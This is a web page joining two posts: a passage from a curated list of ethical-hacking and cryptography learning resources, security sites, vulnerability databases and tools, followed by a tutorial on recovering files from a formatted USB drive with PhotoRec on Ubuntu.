  3. HOW TO LEARN ETHICAL HACKING – By Astalavista.com
  4. PENETRATION TESTING TUTORIAL – By Guru99.com
  5. BACKTRACK PENETRATION TESTING TUTORIAL
  6. INTRODUCTION TO PENETRATION TESTING
  7. INFORMATION GATHERING WITH NMAP
  8. SIMPLE HOW TO ARTICLES By Open Web Application Security
  9. THE SIX DUMBEST IDEAS IN COMPUTER SECURITY
  10. SECURE DESIGN PRINCIPLES
  11. 10 STEPS TO SECURE SOFTWARE

Cryptography Related Tutorials

Cryptography is must know topic for any aspiring security professional or a ethical hacker. You must understand how encryption and decryption is done. You must understand why some of the old encryption techniques do not work in modern computing world.

This is a important area and a lot of software programmers and professional do not understand it very well. Learning cryptography involves a lot of good understanding of mathematics, this means you also need to have good fundamentals on discrete mathematics.

  1. INTRODUCTION TO PUBLIC KEY CRYPTOGRAPHY
  2. CRYPTO TUTORIAL
  3. INTRODUCTION TO CRYPTOGRAPHY
  4. AN OVERVIEW OF CRYPTOGRAPHY
  5. CRYPTOGRAPHY TUTORIALS – Herong’s Tutorial Examples
  6. THE CRYPTO TUTORIAL – Learn How to Keep Secret Secret
  7. INTRODUCTION TO CRYPTOLOGY, PART 1: BASIC CRYPTOLOGY CONCEPTS

Websites For Security Related Articles And News

These are some websites, that you may find useful to find hacking related resources and articles. A lot of simple tricks and tips are available for experimenting through these sites for improving yourself to become advanced hacker.

In recent years, many people are aspiring to learn how to hack. With growing interest in this area, a lot of different types of hacking practices are evolving. With popularity of social networks many people have inclined towards vulnerability in various social networks like facebook, twitter, and myspace etc.

Continuous learning about latest security issues, news and vulnerability reports are really important for any hacker or a security professional. Some of the sites that keep publishing informative articles and news are listed here.

  1. HTTP://WWW.ASTALAVISTA.COM/
  2. HTTP://PACKETSTORMSECURITY.COM/
  3. HTTP://WWW.BLACKHAT.COM/
  4. HTTP://WWW.METASPLOIT.COM/
  5. HTTP://SECTOOLS.ORG/
  6. HTTP://WWW.2600.COM/
  7. DEF CON – HACKING CONFERENCE
  8. HTTP://WWW.BREAKTHESECURITY.COM/
  9. HTTP://WWW.HACKING-TUTORIAL.COM/
  10. HTTP://WWW.EVILZONE.ORG/
  11. HTTP://HACKADAY.COM/
  12. HTTP://WWW.HITB.ORG/
  13. HTTP://WWW.HACKTHISSITE.ORG/
  14. HTTP://PENTESTMAG.COM
  15. HTTP://WWW.SECURITYTUBE.NET/
  16. HTTPS://WWW.SSLLABS.COM/

EBooks And Whitepapers

Some of the research papers by security experts and gurus can provide you a lot of information and inspiration. White papers can be really difficult to read and understand therefore you may need to read them multiple times. Once you understand the topic well, reading will become much faster and you will be able to skim through a lot content in less time.

  1. HANDBOOK OF APPLIED CRYPTOGRAPHY – This ebook contains some free chapter from one of the popular cryptography books. The full book is also available on amazon atCRYPTOGRAPHY BOOK.
  2. NETWORK PENETRATION TESTING GUIDE
  3. HOW TO HACK ANYTHING IN JAVA
  4. MCAFEE ON IPHONE AND IPAD SECURITY
  5. A GOOD COLLECTION OF WHITE PAPERS ON SECURITY AND VULNERABILITIES – This site contains collection of white papers from different sources and some of these white papers are really worth referring.
  6. ENGINEERING PRINCIPLES FOR INFORMATION TECHNOLOGY SECURITY
  7. BASIC PRINCIPLES OF INFORMATION PROTECTION
  8. OPEN WEB APPLICATION SECURITY PROJECT – OWASP is one of the most popular sites that contains web application security related information .

Videos & Play Lists

Those who like to watch video tutorials, here are few I liked. However there are many small video available on youtube. Feel free to explore more and share with us if you like something.

  1. CRYPTOGRAPHY COURSE By Dan Boneh Stanford University
  2. OPEN SECURITY TRAINING– Youtube Playlist of More than 90 hours. I have found this to be the biggest free training available for security related topic.
  3. OWASP APPSEC USA 2011: Youtube Playlist containing compilation of OWASP conference highlight in 2011.
  4. DEFCON: HOW I MET YOUR GIRLFRIEND – Defcon is one of the most popular hacker conference. The presenters in this conference are well know inside the hacking industry.
  5. DEFCON: WHAT HAPPENS WHEN YOU STEAL A HACKERS COMPUTER
  6. DEFCON: NMAP: SCANNING THE INTERNET
  7. PUBLIC KEY CRYPTOGRAPHY: Diffie-Hellman Key Exchange
  8. WEB APPLICATION PEN TESTING
  9. INTRO TO SCANNING NMAP, HPING, AMAP, TCPDUMP, METASPLOIT

Forums For Hackers And Security Professionals

Just like any other area, forums are really great help for learning from other experts. Hundreds of security experts and ethical/non-ethical hackers are willing to share their knowledge on forums for some reason. Please keep in mind to do enough research before post a question and be polite to people who take time to answer your question.

  1. STACKOVERFLOW FOR SECURITY PROFESSIONALS
  2. HTTP://DARKSAT.X47.NET/
  3. HTTP://FORUMS.SECURITYINFOWATCH.COM/
  4. HTTP://FORUMS.CNET.COM/SPYWARE-VIRUSES-SECURITY-FORUM/
  5. HTTP://WWW.HACKFORUMS.NET/FORUMDISPLAY.PHP?FID=47

Vulnerability Databases And Resources

Vulnerability Databases are the first place to start your day as a security professional. Any new vulnerability detection is generally available through the public vulnerability databases. These databases are a big source of information for hackers to be able to understand and exploit/avoid/fix the vulnerability.

  1. HTTP://WWW.EXPLOIT-DB.COM/
  2. HTTP://1337DAY.COM/
  3. HTTP://SECURITYVULNS.COM/
  4. HTTP://WWW.SECURITYFOCUS.COM/
  5. HTTP://WWW.OSVDB.ORG/
  6. HTTP://WWW.SECURITEAM.COM/
  7. HTTP://SECUNIA.COM/ADVISORIES/
  8. HTTP://INSECURE.ORG/SPLOITS_ALL.HTML
  9. HTTP://ZERODAYINITIATIVE.COM/ADVISORIES/PUBLISHED/
  10. HTTP://NMRC.ORG/PUB/INDEX.HTML
  11. HTTP://WEB.NVD.NIST.GOV
  12. HTTP://WWW.VUPEN.COM/ENGLISH/SECURITY-ADVISORIES/
  13. HTTP://WWW.VUPEN.COM/BLOG/
  14. HTTP://CVEDETAILS.COM/
  15. HTTP://WWW.RAPID7.COM/VULNDB/INDEX.JSP
  16. HTTP://OVAL.MITRE.ORG/

Product Specific Vulnerability Information

Some of the very popular products in the world require a special attention and therefore you may want to look at the specific security websites directly from vendors. I have kept Linux. Microsoft and apache in this list, however it may apply to any product you may be heavily using.

  1. RED HAT SECURITY AND OTHER UPDATES SITE
  2. MICROSOFT PRODUCTS SECURITY BULLETIN
  3. APACHE FOUNDATION PRODUCTS SECURITY REPOSITORY
  4. UBUNTU SOFTWARE SECURITY CENTER
  5. LINUX SECURITY REPOSITORY

Tools And Programs For Hacking / Security

There are dozens of tools available for doing different types of hacking and tests. Tools are really important to become more productive at your work. Some of the very common tools that are used by hackers are listed here. You may have different choice of tools based on your own comfort.

  1. NMAP
  2. NSS
  3. HPING
  4. TCPDUMP
  5. METASPLOIT
  6. WIRESHARK
  7. NETWORK STUFF
  8. NIKTO

Summary

I have tried to compile some of these resources for my own reference for the journey of learning I am going to start. I am not even at a beginner level of becoming hacker but the knowledge of this field really fascinates me and keeps me motivated for learning more and more. I hope will be able to become successful in this.

A lot of people use their knowledge skills for breaking stuff and stealing. I personally think that doing harm to someone is a weak choice and will not have a good ending. I would recommend not to use your skills for any un-ethical endeavor. A single misuse of your skill may jeopardize your career since most companies do a strict third party background check before they hire a ethical hacker or a security personal.

There are dozens of companies looking for ethical hackers and security professionals. There are really good number of opportunities in this area and its really niche compensation segment. You will be easily able to get a decent job without even acquiring all the expert level skills to become a pro hacker.

Source: fromdev.com

 

How to Recover Data from Corrupt / formatted USB Flash via Photorec in linux/ubuntu

Hi all, today we’ll be helping you guys to recover data from your formatted or virus corrupt USB Flash(Pen drive) , Hard Disk, Memory Sticks, etc in Linux. In this tutorial we’ll be using PhotoRec, a package of TestDisk.

TestDisk is a free and Open Source Software which was primarily designed to help recover lost partitions and/or make non-booting disks bootable again when these symptoms are caused by faulty software, certain types of viruses or human error (such as accidentally deleting a Partition Table).

If you accidentally deleted your data or you formatted your USB flash or your friend running Virus full Windows corrupted it then, PhotoRec is an awesome tool for you to choose for Data Recovery.

TestDisk can

  • Fix partition table, recover deleted partition
  • Recover FAT32 boot sector from its backup
  • Rebuild FAT12/FAT16/FAT32 boot sector
  • Fix FAT tables
  • Rebuild NTFS boot sector
  • Recover NTFS boot sector from its backup
  • Fix MFT using MFT mirror
  • Locate ext2/ext3/ext4 Backup SuperBlock
  • Undelete files from FAT, exFAT, NTFS and ext2 filesystem
  • Copy files from deleted FAT, exFAT, NTFS and ext2/ext3/ext4 partitions.

Here are the steps that you’ll need to follow to use photorec to recover data from the memory device:

1. Installing PhotoRec

First we’ll need to update our repository index using the command below, I am running Ubuntu 14.04 LTS (Trusty) so I will go for sudo apt-get update. It differs by distro used:

sudo apt-get update

Then, We’ll gonna install testdisk which includes the package PhotoRec in it.

sudo apt-get install testdisk

Note: PhotoRec is included in testdisk, so you’ll no need to install photorec separately. 

2. Recovering Data

Ok, now we’ll go towards or real and important stuff ie Recovering our deleted data or formatted USB stick. For that we’ll gonna run photorec. Photorec allows you to recover every type of data from the device.

sudo photorec

The above command will show you the list of the memory devices detected by your computer as shown in the figure below:

12

Then, we’ll gonna select the partition which we have the data and we’ll wanna select it. If we know the  format of data we need to recover, you select File Opt option in the menu. You can do that by pressing right button.

13

You can select the format by pressing spacebar and then, press b to save the changes.

13

Then, previous menu will come, then select Search to search for the lost data.

15

Then, We’ll gonna select the location where to save. Note: Please do not select directory of the memory device for the destination.

Select .. to go back, Enter to get into the directory and press C when you are done to choose that as destination.

16

After you select the directory, the program will start fetching the data you want to get recovered. After it is done, you’ll be able to browse your files in the place where you have selected the destination to save.

17

Yes, now we are done. We have successfully recovered the required data from our memory stick using Photorec. You can visit the website of PhotoRec if you need more information regarding these or can comment below.

 

Source : http://linoxide.com/